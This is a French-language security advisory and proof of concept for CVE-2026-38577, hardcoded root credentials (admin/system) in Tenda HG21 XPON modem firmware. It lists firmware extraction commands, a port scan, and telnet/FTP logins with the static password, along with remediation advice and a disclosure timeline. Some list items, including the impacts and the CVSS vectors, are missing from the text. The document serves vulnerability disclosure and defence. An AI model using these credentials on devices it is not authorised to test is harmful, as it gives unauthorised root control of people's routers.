
Preuve de concept démontrant des identifiants root codés en dur (admin/system) dans le firmware du modem XPON Tenda HG21, permettant un accès root non autorisé via telnet et FTP.
| Champ | Valeur |
|---|---|
| ID CVE | CVE-2026-38577 |
| Fournisseur | Tenda |
| Produit | Tenda HG21 (modem fibre XPON) |
| Version concernée | V4.0.0-260302 |
| Clé produit | HG21-V1.0-TDE01 |
| Version matérielle | V1.0 |
| Date de compilation du firmware | 2026-03-02 |
| Fichier du firmware | US_HG21re_300002982_en_xpon_2.zip |
| Classe de vulnérabilité | CWE-798 : utilisation d'identifiants codés en dur |
| Découvreur | Anmol Singh Rajput — chercheur en sécurité indépendant |
| Statut de divulgation | Fournisseur pas encore notifié au moment de la réservation du CVE — un délai de divulgation responsable de 90 jours s'applique à compter de la date d'attribution du CVE |
L'analyse du firmware du modem fibre XPON Tenda HG21 a révélé un compte administratif codé en dur intégré à l'image du firmware livré. Ce compte dispose de privilèges root complets (UID 0) et ses identifiants sont statiques sur tous les appareils, ce qui signifie que tout attaquant pouvant atteindre un service d'administration exposé sur une unité vulnérable peut s'authentifier en tant que root sans avoir besoin de connaître le mot de passe de l'interface web défini par le client.
/etc/passwd dans le firmware extrait contient une entrée admin avec
un hachage de mot de passe SHA256crypt qui correspond à la valeur
statique system.0 — c'est-à-dire qu'il est root, et non un
compte de service restreint./etc/shadow n'est présent, donc le hachage faible/statique dans
passwd est la seule barrière protégeant le compte./etc/inetd.conf lance telnetd et ftpd, tous deux démarrés en tant
que root, donc le compte codé en dur est accessible via le réseau, et
pas seulement sur une console série/UART.Un attaquant disposant d'un accès réseau aux services telnet (TCP/23)
ou FTP (TCP/21) d'un appareil vulnérable peut se connecter en tant
qu'admin avec le mot de passe statique et obtenir un shell root / un
accès aux fichiers au niveau root. Cela permet, au minimum :
Vecteurs CVSS de la soumission originale (la notation du fournisseur peut différer une fois publiée) :
Il s'agit d'une preuve de concept basée sur les identifiants — elle démontre que le compte codé en dur s'authentifie et accorde les droits root, et non d'une exploitation de corruption mémoire. Exécutez-la uniquement contre un appareil qui vous appartient ou pour lequel vous êtes explicitement autorisé à effectuer des tests.
# Extraire le firmware (binwalk ou l'outil du fournisseur de votre choix)
binwalk -e US_HG21re_300002982_en_xpon_2.bin
# Localiser et inspecter le fichier passwd
find . -name passwd
cat squashfs-root/etc/passwd
# -> admin:<sha256crypt-hash-of-"system">:0:0:root:/root:/bin/sh
nmap -p 21,23 <target-ip>
telnet <target-ip>
# login: admin
# password: system
ftp <target-ip>
# Name: admin
# Password: system
Une connexion réussie sur l'un ou l'autre service renvoie un shell/session
FTP avec privilèges root (id indiquera uid=0(root)).
admin/system
codé en dur, ou au minimum imposer un mot de passe aléatoire unique par
appareil défini au premier démarrage (non dérivable du seul numéro de
série).telnetd/ftpd par défaut ; exiger une activation explicite
et un canal authentifié et chiffré (SSH/SFTP) pour l'administration à
distance.| Date | Événement |
|---|---|
| 2026-03-02 | Version vulnérable du firmware publiée |
| — | Découverte lors d'une analyse indépendante du firmware |
| 2026-04-09 | CVE-2026-38577 réservé via MITRE |
| — | Notification au fournisseur en attente (fenêtre de divulgation de 90 jours à compter de l'attribution du CVE) |
Découvert et signalé par :